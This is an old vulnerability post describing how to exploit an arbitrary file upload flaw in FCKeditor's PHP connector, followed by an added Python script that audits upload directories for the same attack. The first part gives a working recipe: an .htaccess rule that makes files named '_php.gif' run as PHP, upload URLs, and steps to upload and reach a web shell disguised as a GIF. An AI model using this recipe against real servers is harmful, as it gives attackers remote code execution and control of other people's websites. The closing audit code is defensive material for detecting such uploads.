FCKeditor Upload Vulnerability in All PHP Versions
Author: Anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
# Tell Apache to run any file whose name matches _php.gif through the PHP handler
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
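As an added defensive check (not part of the original advisory), the following Python audit of an upload directory listing flags the two things the steps above depend on: a handler-override file such as .htaccess landing in the upload directory, and a sanitised file name that still carries a script token like _php, which is exactly what the planted FilesMatch rule keys on. The allowlist and the sample listing are assumptions constructed for this example.

```python
import re

# Assumed allowlist for an image-upload directory (not FCKeditor's own configuration).
IMAGE_ALLOWLIST = {"gif", "jpg", "jpeg", "png"}

# Files that let whoever can write them change how the web server handles the directory.
HANDLER_OVERRIDE_FILES = {".htaccess", ".user.ini", "web.config"}

# A script-language token left inside a sanitised stem, e.g. "shell_php" in "shell_php.gif",
# is what a planted <FilesMatch "_php.gif"> rule matches on.
SCRIPT_TOKEN = re.compile(r"(?:^|[._-])(?:php\d?|phtml|phar)(?=$|[._-])", re.IGNORECASE)


def audit_upload_name(name):
    """Return the reasons an uploaded file name should be rejected; empty means it looks safe."""
    reasons = []
    lower = name.lower()
    if lower in HANDLER_OVERRIDE_FILES or lower.startswith("."):
        reasons.append("handler override file or dotfile")
    parts = lower.split(".")
    if len(parts) < 2 or parts[-1] not in IMAGE_ALLOWLIST:
        reasons.append("extension not in allowlist")
    if len(parts) > 2:
        reasons.append("multiple extensions")
    stem = ".".join(parts[:-1])
    if SCRIPT_TOKEN.search(stem):
        reasons.append("script token survives in sanitised name")
    return reasons


def audit_listing(names):
    """Map each suspicious name in a directory listing to its reasons."""
    return {n: r for n in names if (r := audit_upload_name(n))}


# Constructed sample listing of an upload directory after the sequence described above.
SAMPLE_LISTING = ["holiday.jpeg", "logo.png", ".htaccess", "shell_php.gif", "shell.php.gif"]

if __name__ == "__main__":
    for flagged, why in audit_listing(SAMPLE_LISTING).items():
        print(f"{flagged}: {', '.join(why)}")
```

Rejecting the upload at these checks (rather than renaming it) closes both halves of the chain, since the renamed file only becomes executable once the handler override is in place.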